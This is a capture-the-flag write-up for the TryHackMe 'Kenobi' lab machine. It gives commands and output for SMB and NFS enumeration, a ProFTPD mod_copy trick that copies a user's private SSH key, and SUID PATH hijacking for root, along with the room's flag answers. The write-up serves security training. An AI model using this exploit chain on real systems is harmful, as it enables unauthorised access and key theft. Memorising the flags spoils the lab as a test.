Date: 16, May, 2021
Author: Dhilip Sanjay S
Click Here to go to the TryHackMe room.
- Answer: 7
- Steps to Reproduce:
$ nmap -sC -sV 10.10.108.221 -oN nmap.out
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 22:10 IST
Nmap scan report for 10.10.108.221
Host is up (0.21s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 47423/tcp mountd
| 100005 1,2,3 50885/udp6 mountd
| 100005 1,2,3 58983/tcp6 mountd
| 100005 1,2,3 60290/udp mountd
| 100021 1,3,4 34811/tcp6 nlockmgr
| 100021 1,3,4 45227/tcp nlockmgr
| 100021 1,3,4 52659/udp nlockmgr
| 100021 1,3,4 60533/udp6 nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2021-05-16T11:41:09-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-16T16:41:09
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.55 seconds- Samba is the standard Windows interoperability suite of programs for Linux and Unix. It allows end users to access and use files, printers and other commonly shared resources on a companies intranet or internet. Its often referred to as a network file system.
- SMB has two ports, 445 and 139.
- Answer: 3
- Steps to Reproduce:
$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.108.221 -oN nmap-smb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 22:16 IST
Nmap scan report for 10.10.108.221
Host is up (0.17s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.108.221\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 2
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.108.221\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.108.221\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 25.05 seconds- Answer: log.txt
- Steps to Reproduce:
- Connect to the
anonymousSMB share with a blank password
- Connect to the
$ smbclient //10.10.108.221/anonymous
Enter WORKGROUP\roots password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 16:19:09 2019
.. D 0 Wed Sep 4 16:26:07 2019
log.txt N 12237 Wed Sep 4 16:19:09 2019
9204224 blocks of size 1024. 6877104 blocks available$ smbget -R smb://10.10.108.221/anonymous
Password for [root] connecting to //anonymous/10.10.108.221:
Using workgroup WORKGROUP, user root
smb://10.10.108.221/anonymous/log.txt
Downloaded 11.95kB in 5 seconds- Answer: 21
- Answer: /var
- Steps to Reproduce:
- Nmap port scan will have shown port 111 running the service rpcbind. This is just a server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve.
- In our case, port 111 is access to a network file system. Lets use nmap to enumerate this.
$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.108.221
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 22:28 IST
Nmap scan report for 10.10.108.221
Host is up (0.17s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836536.0 6877092.0 22% 16.0T 32000
Nmap done: 1 IP address (1 host up) scanned in 3.02 seconds- Answer: 1.3.5
- Steps to Reproduce: Check out the nmap results or connect using
nc <MACHINE_IP> 21.
$ nc 10.10.108.221 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.108.221]- Answer: 3
- Steps to Reproduce:
- By using searchsploit, we can find the exploits:
$ searchsploit ProFTPd 1.3.5
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results- SITE CPFR - This SITE command specifies the source file/directory to use for copying from one place to another directly on the server.
- SITE CPTO - This SITE command specifies the destination file/directory to use for copying from one place to another directly on the server.
$ nc 10.10.108.221 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.108.221]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful$ mkdir /mnt/kenobiNFS
$ mount 10.10.108.221:/var /mnt/kenobiNFS
$ ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 3 root root 4096 May 16 22:54 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 13 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 27 2019 mail
drwxr-xr-x 2 root root 4096 Feb 27 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 30 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 May 16 22:49 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www
$ ls -la /mnt/kenobiNFS/tmp
total 28
drwxrwxrwt 6 root root 4096 May 16 22:49 .
drwxr-xr-x 14 root root 4096 Sep 4 2019 ..
-rw-r--r-- 1 ds ds 1675 May 16 22:49 id_rsa
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
drwx------ 3 root root 4096 May 16 22:08 systemd-private-d12feb6c5fe5457680089dceb1e3ae69-systemd-timesyncd.service-15xzHQ
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn- Copy the Private SSH key in
/var/tmpto local and then unmount the file system.
$ cp /mnt/kenobiNFS/tmp/id_rsa .
$ umount /mnt/kenobiNFS- Answer: d0b0f3f53b6caa532a83915e19224899
- Steps to Reproduce:
$ chmod 600 id_rsa
$ ssh -i id_rsa kenobi@10.10.108.221
The authenticity of host '10.10.108.221 (10.10.108.221)' cant be established.
ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.108.221' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
103 packages can be updated.
65 updates are security updates.
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899- SUID bits can be dangerous, some binaries such as passwd need to be run with elevated privileges (as its resetting your password on the system), however other custom files could that have the SUID bit can lead to all sorts of issues.
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6- Answer: /usr/bin/menu
- Usually in such vulnerable machines, we can find the binaries like
/usr/bin/sudoand/usr/bin/suhaving SUID bit set! But we can't exploit this becuase, we don't have kenobi's password. - So,
/usr/bin/menuseemed to be out of the ordinary.
- Usually in such vulnerable machines, we can find the binaries like
- Answer: 3
- Steps to Reproduce:
$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :- On running the the various options of the
/usr/bin/menu, we find that the three binaries are being run as root:- /usr/bin/curl (curl -I localhost)
- /usr/bin/uname (uname -r)
- /sbin/ifconfig (ipconfig)
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Sun, 16 May 2021 17:33:24 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :2
4.8.0-58-generic
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
eth0 Link encap:Ethernet HWaddr 02:f5:a8:1e:1a:65
inet addr:10.10.108.221 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::f5:a8ff:fe1e:1a65/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:82827 errors:0 dropped:0 overruns:0 frame:0
TX packets:79967 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3791786 (3.7 MB) TX bytes:4548369 (4.5 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:214 errors:0 dropped:0 overruns:0 frame:0
TX packets:214 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:16037 (16.0 KB) TX bytes:16037 (16.0 KB)- Copy the
/bin/shbinary tocurlin the tmp directory:echo /bin/sh > curl - Change the permission to 777:
chmod 777 curl. - Modify the PATH variable, so the
/tmpdirectory is checked first.
kenobi@kenobi:~$ cd /tmp/
kenobi@kenobi:/tmp$ echo $PATH
/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin- Execute the
/usr/bin/menubinary and choose the option 1.
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)- Answer: 177b3cd8562289f37382721c28381f02
- Steps to Reproduce:
# cd /root
# ls
root.txt
# cat root.txt
177b3cd8562289f37382721c28381f02